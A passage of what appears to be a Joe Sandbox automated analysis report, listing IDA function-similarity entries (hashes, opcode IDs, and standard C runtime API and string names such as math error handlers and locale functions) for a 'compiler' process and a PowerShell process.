                                                            • Instruction Fuzzy Hash: E73148729086419AFB50BF19C1406BCA7A0EB66B88FD441B6CF8C0739DDF3AD952D724
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: FileModuleNamestrrchrstrstr
                                                            • String ID: unable to get ModuleFileName
                                                            • API String ID: 3144931378-205594539
                                                            • Opcode ID: b5f2cbc36472fc4cb0e3656276ea9e80133555ced7d139e9c526c1705f77e15b
                                                            • Instruction ID: ac0b0540651e7bd346ad8a6e8fd222cac069cad687e2522703eef496c675b0cd
                                                            • Opcode Fuzzy Hash: b5f2cbc36472fc4cb0e3656276ea9e80133555ced7d139e9c526c1705f77e15b
                                                            • Instruction Fuzzy Hash: 92217310F0864640FE20BB6A68113F99291EFA7BD0FC452B6EE5E073DDCE3CE5048660
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _cwprintf_s_l
                                                            • String ID: %s at line %d
                                                            • API String ID: 2941638530-3439818798
                                                            • Opcode ID: d6f2888908a2dd680c163834b24145f1a6008817dd3e21db85efc3e19e7cd15d
                                                            • Instruction ID: 5be6b372a37da8a8bad3ee61298f06e304f8980a0b4bf91b69471237478aa16f
                                                            • Opcode Fuzzy Hash: d6f2888908a2dd680c163834b24145f1a6008817dd3e21db85efc3e19e7cd15d
                                                            • Instruction Fuzzy Hash: 8F21CF61B0828645FA68BB6AA5516BDD361DF77BC0F849071EF4D0BF5ECE2CE0858720
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _handle_error
                                                            • String ID: "$pow
                                                            • API String ID: 1757819995-713443511
                                                            • Opcode ID: 7b30ecc590982bc226c08bb59d92b5c56cfb97ac15fdf649d71c3776f9db4a5a
                                                            • Instruction ID: a11abd5823e7cbe3cf7062c52d70d4c7e7fa4736b3422ce10fc57f4496b296bd
                                                            • Opcode Fuzzy Hash: 7b30ecc590982bc226c08bb59d92b5c56cfb97ac15fdf649d71c3776f9db4a5a
                                                            • Instruction Fuzzy Hash: 20211A72D18B8597E370EF14E44066AAAA0FBEB348FA01325FBC90695CDBBDD1459B10
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _cwprintf_s_l
                                                            • String ID: %s:%d: %s
                                                            • API String ID: 2941638530-3176420449
                                                            • Opcode ID: b49ad301e1308b64ffaed0ca03139643b9807cdf7d37a9ac50b3c55cac9770dc
                                                            • Instruction ID: 8975dae9d03d1fec7c580df53016ea4d482dea000ecd9943730d10b8f03b87a8
                                                            • Opcode Fuzzy Hash: b49ad301e1308b64ffaed0ca03139643b9807cdf7d37a9ac50b3c55cac9770dc
                                                            • Instruction Fuzzy Hash: 4011D862F0865541FB10BB2DD8402A893D0EF6ABE0F945275DF5D473DDDD2CD5468720
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _set_errno_from_matherr
                                                            • String ID: tanh
                                                            • API String ID: 1187470696-874243715
                                                            • Opcode ID: 7d2a86f6479949b20b33a8532a791871a298c6eea2214d69dd7ef9dca356721e
                                                            • Instruction ID: 8ab715bed7998ac193d7877de744099b2cbbbd190b436fd3f1c57c4dfffed03b
                                                            • Opcode Fuzzy Hash: 7d2a86f6479949b20b33a8532a791871a298c6eea2214d69dd7ef9dca356721e
                                                            • Instruction Fuzzy Hash: 0421FF76A197459BEB60FF28A44026AB2B0FB99700F905579FB8D8375EDE3CD4448F10
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: CompareStringtry_get_function
                                                            • String ID: CompareStringEx
                                                            • API String ID: 3328479835-2590796910
                                                            • Opcode ID: f6ed536225230fea3da8ba20fc9ba8ab58a260ed9f37b883d5d7c59dbefcbe8d
                                                            • Instruction ID: bf286ab7506396f2599771a42006c950f4d8aea293fdef0ecb8e76ae4f148b6a
                                                            • Opcode Fuzzy Hash: f6ed536225230fea3da8ba20fc9ba8ab58a260ed9f37b883d5d7c59dbefcbe8d
                                                            • Instruction Fuzzy Hash: B3112C36608B8086E760EB09B4402AAF7A0F799B80F984135EFCD43B1DDF3CD5508B50
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: DateFormattry_get_function
                                                            • String ID: GetDateFormatEx
                                                            • API String ID: 595753042-159735388
                                                            • Opcode ID: 34a8d95a73a27ed6ac5aa0aef5f011841f0b742d4f45189685d2443132902981
                                                            • Instruction ID: e661a4cb1cec711aecbd78736cbc1e449305865ea15779ffe77111594b5c58aa
                                                            • Opcode Fuzzy Hash: 34a8d95a73a27ed6ac5aa0aef5f011841f0b742d4f45189685d2443132902981
                                                            • Instruction Fuzzy Hash: 1D115171A09B8186E610EB59B4401AAF7A0FB99BD0F984175FF8D43B6DCE3CD5508B40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: FormatTimetry_get_function
                                                            • String ID: GetTimeFormatEx
                                                            • API String ID: 3261793192-1692793031
                                                            • Opcode ID: 9572ec2cfb2d0fff19f141f608b61a55d30443e68d939441d7b2005ed089d0ad
                                                            • Instruction ID: 11f4857bad03b1ffbdb8ca23e0c017f914ecdbb7391d5a245a1dafa1e16daf1f
                                                            • Opcode Fuzzy Hash: 9572ec2cfb2d0fff19f141f608b61a55d30443e68d939441d7b2005ed089d0ad
                                                            • Instruction Fuzzy Hash: C3118C71A09B8186F610EB1AA4400AAF7A0FB99BC0F984176FF8D43B6DCE3CD5518B40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _cwprintf_s_l
                                                            • String ID: %s:%d: %s
                                                            • API String ID: 2941638530-3176420449
                                                            • Opcode ID: b5aa331dfc1da5f80685daa531f65a8795fdd259dc0391fe76681e6c0d620240
                                                            • Instruction ID: 39cff0b1ae38575a25096c6ff464a786d68fbfdd3c05bed6c96e6315798d9d30
                                                            • Opcode Fuzzy Hash: b5aa331dfc1da5f80685daa531f65a8795fdd259dc0391fe76681e6c0d620240
                                                            • Instruction Fuzzy Hash: C201A255F0969148FA64BB0A9840BE5A710EFBBBC0F889071EF4D1BB4ECD2CD4088710
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _handle_error
                                                            • String ID: !$cos
                                                            • API String ID: 1757819995-1949035351
                                                            • Opcode ID: b0e761f792873da9f84ec97e1104178f4636fe0dc204ba03d8786ff8f5a6878c
                                                            • Instruction ID: a019eefbf2e8647bc4c888203b1af29e44179821370e0f67cc3250933db6d80e
                                                            • Opcode Fuzzy Hash: b0e761f792873da9f84ec97e1104178f4636fe0dc204ba03d8786ff8f5a6878c
                                                            • Instruction Fuzzy Hash: 3001A572A18BC542EA14EF25940036AA161FBAABD4FD04375FA9907BDDDF6CD1415700
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _handle_error_raise_exc
                                                            • String ID: !$sin
                                                            • API String ID: 1935476177-1565623160
                                                            • Opcode ID: 8df25b79fe6bb5d636ce5aab3a5d99b74cd068bdb20b50b3a7ddf8ff0cc9fedd
                                                            • Instruction ID: f13c341aab3c22f6943a3551b4e62f6651af533fb8ccc32d5b6fc34caf227644
                                                            • Opcode Fuzzy Hash: 8df25b79fe6bb5d636ce5aab3a5d99b74cd068bdb20b50b3a7ddf8ff0cc9fedd
                                                            • Instruction Fuzzy Hash: 4C019671A18B8582EA54EF16A40037AA561FBAABD4F904334FE9D17B9CEF7CD1408B00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _handle_error_raise_exc
                                                            • String ID: !$cos
                                                            • API String ID: 1935476177-1949035351
                                                            • Opcode ID: 8e42d1cbe5100210f0b3884798fa4b23dd32e4648c13ae4810f3e993030f723a
                                                            • Instruction ID: b44dddbed23906aaa98013f0ffb46b41ca259acafe8c59ea306f14a22a852a5c
                                                            • Opcode Fuzzy Hash: 8e42d1cbe5100210f0b3884798fa4b23dd32e4648c13ae4810f3e993030f723a
                                                            • Instruction Fuzzy Hash: 3801B571A18B8542EA14EF169400376A161FFABBD4F904334FE9906B9CEF7CD1415700
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _handle_error_raise_exc
                                                            • String ID: !$tan
                                                            • API String ID: 1935476177-2428968949
                                                            • Opcode ID: 935e24b105acfd60860e97405ccf4e5002346eae3c521358fcdcccb835f8744f
                                                            • Instruction ID: 209748fe80311d342bf3d9f2d84694766a74cdcd38d6079279f3e3568bc1a028
                                                            • Opcode Fuzzy Hash: 935e24b105acfd60860e97405ccf4e5002346eae3c521358fcdcccb835f8744f
                                                            • Instruction Fuzzy Hash: DC01B171A18B8582EA14EF16940037AA161FFAABD4F904335FE9D07B9CEF7DD0808B00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: _handle_error
                                                            • String ID: "$exp
                                                            • API String ID: 1757819995-2878093337
                                                            • Opcode ID: e928720596b9d94672a02348a76923f70d207e578a94a6fc764d589324dc71b7
                                                            • Instruction ID: e298bf2f11430d4f3149a45c2be7c71ce7de87de3a4270fc53d7f7f5e210341c
                                                            • Opcode Fuzzy Hash: e928720596b9d94672a02348a76923f70d207e578a94a6fc764d589324dc71b7
                                                            • Instruction Fuzzy Hash: 2E018C76929B8887F620EF24D4452AAB660FFEB704FA41325FB8416664CB7DD485DF00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: DefaultUsertry_get_function
                                                            • String ID: GetUserDefaultLocaleName
                                                            • API String ID: 3217810228-151340334
                                                            • Opcode ID: 03411ff9c2691ac1922605afe54f956f17eda239d58754208771313afc30d5dc
                                                            • Instruction ID: 7084727c298ed6c27b3e5b48b5e5bd6903eb164d0af8481df45893c668a42286
                                                            • Opcode Fuzzy Hash: 03411ff9c2691ac1922605afe54f956f17eda239d58754208771313afc30d5dc
                                                            • Instruction Fuzzy Hash: A7F0E250B0A64262FB057B6DA5805B8D261EFAE780FC880B5FF0D06BADDE2CE4448360
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • try_get_function.LIBVCRUNTIME ref: 00007FF7BADB7F5D
                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,-00000018,00007FF7BADBBDAA,?,?,?,00007FF7BADBBCA2,?,?,?,00007FF7BADA9D09), ref: 00007FF7BADB7F77
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: CountCriticalInitializeSectionSpintry_get_function
                                                            • String ID: InitializeCriticalSectionEx
                                                            • API String ID: 539475747-3084827643
                                                            • Opcode ID: eefd55364696c6910bdfdda8fd7c70efa449914f634fb1272f63a95235c7ae12
                                                            • Instruction ID: ea9c984ae1381c3fa1766ab29586912d2a6e1c715e39cd429fb39143ecb3d1d3
                                                            • Opcode Fuzzy Hash: eefd55364696c6910bdfdda8fd7c70efa449914f634fb1272f63a95235c7ae12
                                                            • Instruction Fuzzy Hash: A6F05E25A1978592FB04BB59E4404B5A320EF5AB80FC885B9EF9D03B5CDE3CE455C760
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • try_get_function.LIBVCRUNTIME ref: 00007FF7BADB7C6D
                                                            • TlsSetValue.KERNEL32(?,?,?,00007FF7BADB92BE,?,?,?,00007FF7BADA9B4D,?,?,?,?,00007FF7BADBE8F3), ref: 00007FF7BADB7C84
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: Valuetry_get_function
                                                            • String ID: FlsSetValue
                                                            • API String ID: 738293619-3750699315
                                                            • Opcode ID: 06c61580f9840f15817015c19dca4b045d456ef0908e53a19be99ee32c966495
                                                            • Instruction ID: 627dc6773a61672cdd77626eafd1218717ec9ba66ec992adb900f14026e53de8
                                                            • Opcode Fuzzy Hash: 06c61580f9840f15817015c19dca4b045d456ef0908e53a19be99ee32c966495
                                                            • Instruction Fuzzy Hash: 5CE065A1A0E64292FA047B58E4040B9A321EF59780FD880F5EF4D0636CDE3CE458C260
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            • try_get_function.LIBVCRUNTIME ref: 00007FF7BAD8DD45
                                                            • TlsSetValue.KERNEL32(?,?,?,00007FF7BAD8D91D,?,?,?,?,00007FF7BAD8D790,?,?,?,?,00007FF7BAD8C153), ref: 00007FF7BAD8DD5C
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: Valuetry_get_function
                                                            • String ID: FlsSetValue
                                                            • API String ID: 738293619-3750699315
                                                            • Opcode ID: 09468e8d03e82d1305376de481b1338bf56d9ddb3db22b698813e028a0dee6dd
                                                            • Instruction ID: c6067a760f1c7112e7ed59e02d33096c6e36a4a355582f825b1be8078caeb9b9
                                                            • Opcode Fuzzy Hash: 09468e8d03e82d1305376de481b1338bf56d9ddb3db22b698813e028a0dee6dd
                                                            • Instruction Fuzzy Hash: 6AE065B5A0864282FA047B58F4081B4A321EF69B80FD94075DF9D0739CCE3CE555C270
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000B.00000002.1902919474.00007FF7BAD31000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF7BAD30000, based on PE: true
                                                            • Associated: 0000000B.00000002.1902901001.00007FF7BAD30000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1902985149.00007FF7BADCE000.00000002.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903009535.00007FF7BADEA000.00000004.00000001.01000000.00000007.sdmp
                                                            • Associated: 0000000B.00000002.1903026972.00007FF7BADED000.00000002.00000001.01000000.00000007.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_11_2_7ff7bad30000_compiler.jbxd
                                                            Similarity
                                                            • API ID: DownlevelLocaleName__crttry_get_function
                                                            • String ID: LocaleNameToLCID
                                                            • API String ID: 404522899-2050040251
                                                            • Opcode ID: d756f7f956f81b3b3dd7577028f241a48aafa3ad52789f0d3d8db9e85b72364b
                                                            • Instruction ID: 85876aeb68a2d53366641d4bb069f9d44d053c91859124a667233742468c8de5
                                                            • Opcode Fuzzy Hash: d756f7f956f81b3b3dd7577028f241a48aafa3ad52789f0d3d8db9e85b72364b
                                                            • Instruction Fuzzy Hash: 46E0E564E0964292FB04BB18E4000B8A210DF6A380FD881B5EF6D0635DEE3CE944C260
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.2565247450.00007FFD9B3D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3D0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_7ffd9b3d0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a36415434ada177da4bfd51bc9d691eeff6cdb2f3a4715ce26afb9fb289a322d
                                                            • Instruction ID: 901356a7dd21ff05b80abdb16abab9b7819801088d6651adfc6ceca7eb684324
                                                            • Opcode Fuzzy Hash: a36415434ada177da4bfd51bc9d691eeff6cdb2f3a4715ce26afb9fb289a322d
                                                            • Instruction Fuzzy Hash: 3D32C630A18A4D8FDB98EF5CC4A5AA977E1FF99310F14027DD449C7296CA35F842CB81
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Memory Dump Source
                                                            • Source File: 0000000E.00000002.2566535279.00007FFD9B4A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B4A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_14_2_7ffd9b4a0000_powershell.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
